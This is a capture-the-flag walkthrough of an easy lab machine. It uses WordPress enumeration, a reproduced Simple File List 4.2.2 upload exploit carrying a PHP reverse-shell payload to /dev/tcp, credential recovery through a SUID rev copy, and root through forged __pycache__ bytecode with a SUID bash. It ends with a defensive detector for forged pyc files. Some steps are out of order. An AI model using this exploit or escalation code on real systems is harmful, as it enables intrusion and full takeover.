Mazesec_Fromytoy

Box source: QQ group 660930334

Difficulty: Easy

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:31 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00072s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00060s latency).
MAC Address: 08:00:27:48:23:C1 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.67
Host is up (0.00053s latency).
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.54 seconds

Target IP: 192.168.2.67

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:31 +0800
Nmap scan report for 192.168.2.67
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.93 seconds

Open ports: 22, 80, 3000

2) Service and version scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,3000 192.168.2.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:32 +0800
Nmap scan report for 192.168.2.67
Host is up (0.00082s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
3000/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-title: VOCALOID NEXUS – The Cyber-Digital Soul Archive
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-generator: WordPress 6.9
|_http-server-header: Apache/2.4.51 (Debian)
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.56 seconds

3) UDP scan

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.67
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-02 16:33 +0800
Nmap scan report for 192.168.2.67
Host is up (0.00074s latency).
All 100 scanned ports on 192.168.2.67 are in ignored states.
Not shown: 60 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response)
MAC Address: 08:00:27:F9:7B:3D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 60.21 seconds

II. Web Penetration

1. HTTP service

Visiting port 80 turns up nothing useful:

┌──(root㉿kali)-[~/miaosec]
└─# curl http://192.168.2.67
index

2. Directory scanning

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.67 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,js,txt,bak
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.2.67
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8.2
[+] Extensions: txt,bak,php,html,js
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
index.html (Status: 200) [Size: 6]
server-status (Status: 403) [Size: 277]

III. Simple File List

Port 3000 runs WordPress, so scan it with wpscan:

┌──(root㉿kali)-[~/miaosec]
└─# wpscan --url http://192.168.2.67:3000 --api-token Jrh7ozpao7LtkyqVZwMeXCKeqJN0zHplyeG8SaQU124 -e u,vp
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | _ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.28
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.2.67:3000/ [192.168.2.67]
[+] Started: Tue Feb 3 10:35:45 2026

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.51 (Debian)
| - X-Powered-By: PHP/7.4.27
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://192.168.2.67:3000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.2.67:3000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.2.67:3000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.2.67:3000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 6.9 identified (Latest, released on 2025-12-02).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.2.67:3000/feed/, <generator>https://wordpress.org/?v=6.9</generator>
| - http://192.168.2.67:3000/comments/feed/, <generator>https://wordpress.org/?v=6.9</generator>

[+] WordPress theme in use: twentytwentyone
| Location: http://192.168.2.67:3000/wp-content/themes/twentytwentyone/
| Last Updated: 2025-12-03T00:00:00.000Z
| Readme: http://192.168.2.67:3000/wp-content/themes/twentytwentyone/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://192.168.2.67:3000/wp-content/themes/twentytwentyone/style.css?ver=1.4
| Style Name: Twenty Twenty-One
| Style URI: https://wordpress.org/themes/twentytwentyone/
| Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.2.67:3000/wp-content/themes/twentytwentyone/style.css?ver=1.4, Match: 'Version: 1.4'

[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] simple-file-list
| Location: http://192.168.2.67:3000/wp-content/plugins/simple-file-list/
| Last Updated: 2026-01-29T20:30:00.000Z
| [!] The version is out of date, the latest version is 6.1.18
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Urls In 404 Page (Passive Detection)
|
| [!] 12 vulnerabilities identified:
|
| [!] Title: Simple File List < 4.2.3 - Unauthenticated Arbitrary File Upload RCE
| Fixed in: 4.2.3
| References:
| - https://wpscan.com/vulnerability/365da9c5-a8d0-45f6-863c-1b1926ffd574
| - https://simplefilelist.com/
| - https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list
| - https://packetstormsecurity.com/files/160221/
|
| [!] Title: Simple File List < 4.2.8 - Authenticated Arbitrary File Deletion
| Fixed in: 4.2.8
| References:
| - https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12832
| - https://ctulhu.me/2020/05/16/cve-2020-12832/
|
| [!] Title: Simple File List < 4.4.12 - Reflected Cross-Site Scripting
| Fixed in: 4.4.12
| References:
| - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3062
|
| [!] Title: Simple File List < 4.4.13 - Page Creation via CSRF
| Fixed in: 4.4.13
| References:
| - https://wpscan.com/vulnerability/80d475ca-b475-4789-8eef-9c4d880853b7
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3208
|
| [!] Title: Simple File List < 4.4.12 - Admin+ Stored Cross-Site Scripting
| Fixed in: 4.4.12
| References:
| - https://wpscan.com/vulnerability/b57272ea-9a8a-482a-bbaa-5f202ca5b9aa
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3207
|
| [!] Title: Simple File List < 6.0.10 - Admin+ Stored XSS
| Fixed in: 6.0.10
| References:
| - https://wpscan.com/vulnerability/13621b13-8d31-4214-a665-cb15981f3ec1
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1025
|
| [!] Title: Simple File List < 6.1.10 - Admin+ Stored XSS
| Fixed in: 6.1.10
| References:
| - https://wpscan.com/vulnerability/3436f5d4-f620-49f1-9e90-37883a8ad0dc
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39924
| - https://patchstack.com/database/vulnerability/simple-file-list/wordpress-simple-file-list-plugin-6-1-9-cross-site-scripting-xss-vulnerability
|
| [!] Title: Simple File List < 6.1.10 - Unauthenticated Arbitrary File Deletion
| Fixed in: 6.1.10
| References:
| - https://wpscan.com/vulnerability/c2121b69-2aed-4db4-8191-448deceab091
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44227
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/7eada9b7-8d53-4e95-858e-aa706f74b2a1
|
| [!] Title: Simple File List < 6.1.13 - Reflected Cross-Site Scripting
| Fixed in: 6.1.13
| References:
| - https://wpscan.com/vulnerability/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10146
|
| [!] Title: Simple File List < 6.1.14 - Missing Authorization to Unauthenticated Minor Settings Update
| Fixed in: 6.1.14
| References:
| - https://wpscan.com/vulnerability/aedab3a9-cf83-4f69-a282-7d1b07176e95
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-47450
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/207eedfc-8b42-49be-be7a-98da38ad7ee6
|
| [!] Title: Simple File List < 6.1.15 - Unauthenticated Arbitrary File Download
| Fixed in: 6.1.15
| References:
| - https://wpscan.com/vulnerability/45956bfe-5c31-4e6b-b9a8-bd300cb82569
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-54021
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/dcbb6a4c-120f-43d1-8ec9-dac52186d81a
|
| [!] Title: Simple File List <= 6.1.16 - Missing Authorization
| References:
| - https://wpscan.com/vulnerability/25b593ff-9e7e-43e8-b630-9fdd6f3548eb
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68591
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/8939cad2-f9fc-45aa-97d1-9a1a2a59bf94
|
| Version: 4.2.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.2.67:3000/wp-content/plugins/simple-file-list/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.2.67:3000/wp-content/plugins/simple-file-list/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=======================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] VOCALOID NEXUS
| Found By: Oembed API - Author Name (Aggressive Detection)
| - http://192.168.2.67:3000/wp-json/oembed/1.0/embed?url=http://192.168.2.67:3000/&format=json

[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 4
| Requests Remaining: 21

[+] Finished: Tue Feb 3 10:36:02 2026
[+] Requests Done: 65
[+] Cached Requests: 9
[+] Data Sent: 16.72 KB
[+] Data Received: 510.302 KB
[+] Memory used: 238.77 MB
[+] Elapsed time: 00:00:17

The scan shows Simple File List 4.2.2, which is affected by the unauthenticated arbitrary file upload (fixed in 4.2.3):

https://www.exploit-db.com/exploits/48979

Exploit code:

#!/usr/bin/python
# -*- coding: utf-8 -*-
# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Arbitrary File Upload
# Date: 2020-11-01
# Exploit Author: H4rk3nz0 based off exploit by coiffeur
# Original Exploit: https://www.exploit-db.com/exploits/48349
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/
# Version: Wordpress v5.4 Simple File List v4.2.2

import requests
import random
import hashlib
import sys
import os
import urllib3
urllib3.disable_warnings()

dir_path = '/wp-content/uploads/simple-file-list/'
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'

def usage():
    banner = """
NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE
SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL>
AUTHOR: coiffeur
"""
    print(banner)

def generate():
    filename = f'{random.randint(0, 10000)}.png'
    password = hashlib.md5(bytearray(random.getrandbits(8)
                                     for _ in range(20))).hexdigest()
    with open(f'{filename}', 'wb') as f:
        payload = '<?php passthru("bash -i >& /dev/tcp/192.168.1.1/4444 0>&1"); ?>'
        f.write(payload.encode())
    print(f'[ ] File {filename} generated with password: {password}')
    return filename, password

def upload(url, filename):
    files = {'file': (filename, open(filename, 'rb'), 'image/png')}
    datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path,
             'eeSFL_Timestamp': 1587258885, 'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
    r = requests.post(url=f'{url}{upload_path}',
                      data=datas, files=files, verify=False)
    r = requests.get(url=f'{url}{dir_path}{filename}', verify=False)
    if r.status_code == 200:
        print(f'[ ] File uploaded at {url}{dir_path}{filename}')
        os.remove(filename)
    else:
        print(f'[*] Failed to upload {filename}')
        exit(-1)
    return filename

def move(url, filename):
    new_filename = f'{filename.split(".")[0]}.php'
    headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
               'X-Requested-With': 'XMLHttpRequest'}
    datas = {'eeSFL_ID': 1, 'eeFileOld': filename,
             'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
    r = requests.post(url=f'{url}{move_path}',
                      data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        print(f'[ ] File moved to {url}{dir_path}{new_filename}')
    else:
        print(f'[*] Failed to move {filename}')
        exit(-1)
    return new_filename

def main(url):
    file_to_upload, password = generate()
    uploaded_file = upload(url, file_to_upload)
    moved_file = move(url, uploaded_file)
    if moved_file:
        print(f'[+] Exploit seem to work.\n[*] Confirmning ...')
        datas = {'password': password, 'cmd': 'phpinfo();'}
        r = requests.post(url=f'{url}{dir_path}{moved_file}',
                          data=datas, verify=False)
        if r.status_code == 200 and r.text.find('php') != -1:
            print('[+] Exploit work !')
            print(f'\tURL: {url}{dir_path}{moved_file}')
            print(f'\tPassword: {password}')

if __name__ == "__main__":
    if (len(sys.argv) < 2):
        usage()
        exit(-1)
    main(sys.argv[1])

Run the exploit:

┌──(root㉿kali)-[~/miaosec/Nukem-PG-exploit]
└─# python exploit.py "192.168.2.67:3000"
[+] File renamed to reverse.png
[+] File uploaded at http://192.168.2.67:3000/wp-content/uploads/simple-file-list/reverse.png
[+] File moved to http://192.168.2.67:3000/wp-content/uploads/simple-file-list/reverse.php
[^-^] Exploit seems to have worked...
URL: http://192.168.2.67:3000/wp-content/uploads/simple-file-list/reverse.php

The reverse shell comes back on the listener:

┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.67] 39374
Linux 949d50994487 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 GNU/Linux
09:04:35 up 35 min, 0 users, load average: 0.05, 0.27, 0.23
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

IV. Privilege Escalation

1. Getting access as miku

The shell lands inside a Docker container (note the .dockerenv file):

$ ls -la /
total 88
drwxr-xr-x 1 root root 4096 Jan 20 03:33 .
drwxr-xr-x 1 root root 4096 Jan 20 03:33 ..
-rwxr-xr-x 1 root root 0 Jan 20 03:33 .dockerenv
drwxr-xr-x 1 root root 4096 Dec 21 2021 bin
drwxr-xr-x 2 root root 4096 Dec 11 2021 boot
....

List the SUID binaries:

$ find / -type f -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/local/lib/.sys_log_rotator
/bin/mount
/bin/su
/bin/umount

One stands out: /usr/local/lib/.sys_log_rotator

$ /usr/local/lib/.sys_log_rotator -h
Usage: .sys_log_rotator [options] [file ...]

Reverse lines characterwise.

Options:
-h, --help display this help
-V, --version display version

For more details see rev(1).

The binary is simply rev with the same functionality; diff reports no difference:

$ diff /usr/bin/rev /usr/local/lib/.sys_log_rotator

Look for files belonging to the user miku:

$ find / -user miku 2>/dev/null
/usr/local/lib/.sys_log_rotator
/var/www/html/wp-content/uploads/server_backup_info.txt

Use the SUID copy of rev to read server_backup_info.txt (the output comes out character-reversed):

$ /usr/local/lib/.sys_log_rotator /var/www/html/wp-content/uploads/server_backup_info.txt
01-10-5202 :etaD pukcaB
noitacifirev gnidneP :sutatS
:nimdasyS rof etoN
.'yotymorf' tsoh rof slaitnederc yraropmet ot detreveR .deliaf noitator yek HSS ehT
ukim :resU
93_uk1M_di0lac0V :drowssaP

noitacifirev retfa elif siht eteled esaelP :TRELA YTIRUCES

Reversing the text gives the credentials miku:V0cal0id_M1ku_39, which work over SSH:

┌──(root㉿kali)-[~]
└─# ssh miku@192.168.2.67
miku@fromytoy:~$ id
uid=1000(miku) gid=1000(miku) groups=1000(miku)

2. Getting root

Check sudo -l:

miku@fromytoy:~$ sudo -l
Matching Defaults entries for miku on fromytoy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User miku may run the following commands on fromytoy:
(ALL) NOPASSWD: /usr/bin/python3 /usr/local/lib/python_scripts/cleanup_task.py

Script analysis:

miku@fromytoy:~$ cat /usr/local/lib/python_scripts/cleanup_task.py
#!/usr/bin/env python3
import sys
import os
import system_utils

def main():
    print("[*] Starting system cleanup...")
    if os.geteuid() != 0:
        print("[-] Error: This script must be run as root.")
        sys.exit(1)


    system_utils.check_disk_space()
    print("[+] Cleanup completed successfully.")

if __name__ == "__main__":
    main()

It calls check_disk_space() from the system_utils module to report disk usage.

The system_utils.py module is found in /usr/local/lib/python_scripts/:

miku@fromytoy:~$ find / -name 'system_utils' 2>/dev/null
miku@fromytoy:~$ find / -name '*system_utils*' 2>/dev/null
/usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc
/usr/local/lib/python_scripts/system_utils.py

Module contents: it uses os.system to run the shell command df -h and print disk usage:

miku@fromytoy:~$ cat /usr/local/lib/python_scripts/system_utils.py
import os
def check_disk_space():
    print("[*] Checking disk usage...")
    os.system("df -h")

__pycache__ poisoning: look for writable directories

miku@fromytoy:~$ find / -type d -writable 2>/dev/null | grep -Ev '^/run|^/proc|^/sys'
/dev/mqueue
/dev/shm
/usr/local/lib/python_scripts/__pycache__
/tmp
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.XIM-unix
/tmp/.X11-unix
/home/miku
/var/tmp
/var/lib/php/sessions

/usr/local/lib/python_scripts/__pycache__ is world-writable:

miku@fromytoy:~$ ls -la /usr/local/lib/python_scripts/           
total 20
drwxr-xr-x 3 root root 4096 Jan 19 22:50 .
drwxr-xr-x 5 root root 4096 Jan 19 22:40 ..
drwxrwxrwx 2 root root 4096 Jan 20 00:35 __pycache__
-rwxr-xr-x 1 root root 359 Jan 19 22:50 cleanup_task.py
-rw-r--r-- 1 root root 97 Jan 19 22:41 system_utils.py

How the attack works: when Python imports a module it first looks for a compiled .pyc in the __pycache__ directory and validates it by comparing the source timestamp and source size recorded in the .pyc header against the current .py file. If they match, the cached bytecode is used; otherwise the source is recompiled. On Python 3.7+ the .pyc header is 16 bytes: magic number, flags, source timestamp and source size.

Because this directory is writable, we can delete the .pyc that root compiled, compile a malicious system_utils.py in /tmp, and move the resulting .pyc into /usr/local/lib/python_scripts/__pycache__/ to replace the original. The timestamp and size in the header must match the real system_utils.py, or Python will ignore the cache and recompile.

Write the malicious Python file:

miku@fromytoy:/tmp$ nano pwn.py
import os

def check_disk_space():
    os.system("cp /bin/bash /tmp/bash")
    os.system("chmod +s /tmp/bash")

Compile it (this must produce /tmp/__pycache__/pwn.cpython-39.pyc, the path exp.py below expects):

miku@fromytoy:/tmp$ python3 /tmp/exp.py

Delete the original .pyc files:

miku@fromytoy:~$ rm -rf /usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc
miku@fromytoy:~$ rm -rf /usr/local/lib/python_scripts/__pycache__/cleanup_task.cpython-39.pyc

Write exp.py, which patches the header metadata of the compiled file:

miku@fromytoy:/tmp$ nano exp.py
import struct
import os

source_file = "/usr/local/lib/python_scripts/system_utils.py"
target_pyc = "/tmp/__pycache__/pwn.cpython-39.pyc"
output_pyc = "/usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc"

# 1. Get the metadata of root's source file
stat = os.stat(source_file)
mtime = int(stat.st_mtime)
size = stat.st_size & 0xFFFFFFFF

# 2. Read the malicious pyc you compiled
with open(target_pyc, "rb") as f:
    data = bytearray(f.read())

# 3. Patch the header metadata (Python 3.7+ layout)
# Offset 8-11: source timestamp (little-endian)
data[8:12] = struct.pack("<I", mtime)
# Offset 12-15: source file size
data[12:16] = struct.pack("<I", size)

# 4. Write to the target location
with open(output_pyc, "wb") as f:
    f.write(data)

print(f"[+] Successfully forged {output_pyc}")

Run exp.py to generate the .pyc with the corrected header and place it in /usr/local/lib/python_scripts/__pycache__/, overwriting the original .pyc:

miku@fromytoy:/tmp$ python3 /tmp/exp.py
[+] Successfully forged /usr/local/lib/python_scripts/__pycache__/system_utils.cpython-39.pyc

miku@fromytoy:/tmp$ mv __pycache__/ /usr/local/lib/python_scripts/__pycache__/

Run the sudo command to escalate:

miku@fromytoy:/tmp$ sudo /usr/bin/python3 /usr/local/lib/python_scripts/cleanup_task.py
[*] Starting system cleanup...
[+] Cleanup completed successfully.
miku@fromytoy:/tmp$ ls -la /tmp
total 1192
drwxrwxrwt 10 root root 4096 Feb 3 22:20 .
drwxr-xr-x 18 root root 4096 Mar 18 2025 ..
drwxrwxrwt 2 root root 4096 Feb 3 21:24 .ICE-unix
drwxrwxrwt 2 root root 4096 Feb 3 21:24 .Test-unix
drwxrwxrwt 2 root root 4096 Feb 3 21:24 .X11-unix
drwxrwxrwt 2 root root 4096 Feb 3 21:24 .XIM-unix
drwxrwxrwt 2 root root 4096 Feb 3 21:24 .font-unix
-rwsr-sr-x 1 root root 1168776 Feb 3 22:20 bash
-rw-r--r-- 1 miku miku 774 Feb 3 22:19 exp.py
-rw-r--r-- 1 miku miku 111 Feb 3 22:19 pwn.py
drwx------ 3 root root 4096 Feb 3 21:24 systemd-private-55f31a80f4b8437c83a2a1fe00361dc6-apache2.service-KndNHh
drwx------ 3 root root 4096 Feb 3 21:24 systemd-private-55f31a80f4b8437c83a2a1fe00361dc6-systemd-logind.service-aWzEdg
drwx------ 3 root root 4096 Feb 3 21:24 systemd-private-55f31a80f4b8437c83a2a1fe00361dc6-systemd-timesyncd.service-g1GcSi

Root obtained:

3
miku@fromytoy:/tmp$ LC_ALL=C /tmp/bash -p
bash-5.0# id
uid=1000(miku) gid=1000(miku) euid=0(root) egid=0(root) groups=0(root),1000(miku)
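The check Python actually performs before trusting a cached .pyc, and how a defender can tell a forged cache entry from a legitimate one. This is an added example, not part of the original writeup: it replays the importer's mtime/size test, then recompiles the source and compares code objects, and it flags a world-writable __pycache__ and unchecked hash-based pycs (which are never validated at all). The module names and the two sample sources are constructed for the demo.

```python
import importlib.util
import marshal
import os
import py_compile
import stat
import struct
import tempfile

# PEP 552 (Python 3.7+) .pyc header: 4-byte magic, then three little-endian uint32
# words: flags, source mtime, source size.  A timestamp pyc (flags == 0) is trusted as
# soon as mtime and size match the .py file, which is what exp.py's patched header does.
PYC_HEADER = struct.Struct("<4sIII")
TIMESTAMP = py_compile.PycInvalidationMode.TIMESTAMP

def parse_pyc_header(pyc_path):
    """Return (magic, flags, source_mtime, source_size) from a .pyc file."""
    with open(pyc_path, "rb") as f:
        return PYC_HEADER.unpack(f.read(PYC_HEADER.size))

def header_matches_source(pyc_path, source_path):
    """Replicates the importer's own (weak) freshness test for timestamp pycs."""
    magic, flags, mtime, size = parse_pyc_header(pyc_path)
    st = os.stat(source_path)
    return (magic == importlib.util.MAGIC_NUMBER and flags == 0
            and mtime == int(st.st_mtime) and size == (st.st_size & 0xFFFFFFFF))

def bytecode_matches_source(pyc_path, source_path):
    """Strong test: recompile the .py and compare code objects with the cached one."""
    with open(source_path, "rb") as f:
        fresh = compile(f.read(), source_path, "exec", dont_inherit=True)
    with open(pyc_path, "rb") as f:
        cached = marshal.loads(f.read()[PYC_HEADER.size:])
    return cached == fresh

def audit_pycache_entry(source_path):
    """Return findings for the __pycache__ entry that belongs to source_path."""
    findings = []
    pyc_path = importlib.util.cache_from_source(source_path)
    cache_dir = os.path.dirname(pyc_path)
    if os.path.isdir(cache_dir) and os.stat(cache_dir).st_mode & stat.S_IWOTH:
        findings.append("cache dir world-writable")  # the root cause on this box
    if not os.path.exists(pyc_path):
        return findings
    if parse_pyc_header(pyc_path)[1] == 1:  # unchecked hash pyc: never validated
        findings.append("unchecked hash-based pyc")
    if (header_matches_source(pyc_path, source_path)
            and not bytecode_matches_source(pyc_path, source_path)):
        findings.append("header matches source but bytecode differs (forged cache)")
    return findings

def build_demo():
    """Constructed fixture: a clean module and one poisoned the way the writeup does."""
    paths = {}
    for name, poisoned in (("clean", False), ("poisoned", True)):
        root = tempfile.mkdtemp()
        src = os.path.join(root, "system_utils.py")
        with open(src, "w") as f:
            f.write('def check_disk_space():\n    return "df -h"\n')
        pyc = importlib.util.cache_from_source(src)
        os.makedirs(os.path.dirname(pyc))
        os.chmod(os.path.dirname(pyc), 0o777 if poisoned else 0o755)
        if poisoned:
            evil = os.path.join(root, "pwn.py")
            with open(evil, "w") as f:
                f.write('def check_disk_space():\n    return "not df"\n')
            py_compile.compile(evil, cfile=pyc, doraise=True, invalidation_mode=TIMESTAMP)
            st = os.stat(src)
            with open(pyc, "r+b") as f:  # stamp the real source's mtime and size
                f.seek(8)
                f.write(struct.pack("<II", int(st.st_mtime), st.st_size & 0xFFFFFFFF))
        else:
            py_compile.compile(src, cfile=pyc, doraise=True, invalidation_mode=TIMESTAMP)
        paths[name] = (src, pyc)
    return paths
```

The durable fix is the one this box gets wrong: __pycache__ must not be writable by anyone who cannot already edit the .py beside it, because a writer can also drop an unchecked hash-based pyc that skips every freshness test.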

V. Flags

bash-5.0# cat /root/root.txt /home/miku/user.txt 
a6c7cf996c275fa5afe6e47bc6f5c79e



Good morning, and in case I don't see you, Good afternoon, Good evening, And good night
26d1ebd4ec8c55cc69f190d0d37f6dac


願うことさえ
許されない世界なのかな

bash-5.0#

Mazesec_Fromytoy
http://miao-sec.github.io/Maze-sec/Mazesec-Fromytoy/
Author: Miao
Published: February 4, 2026
License: BY-MIAO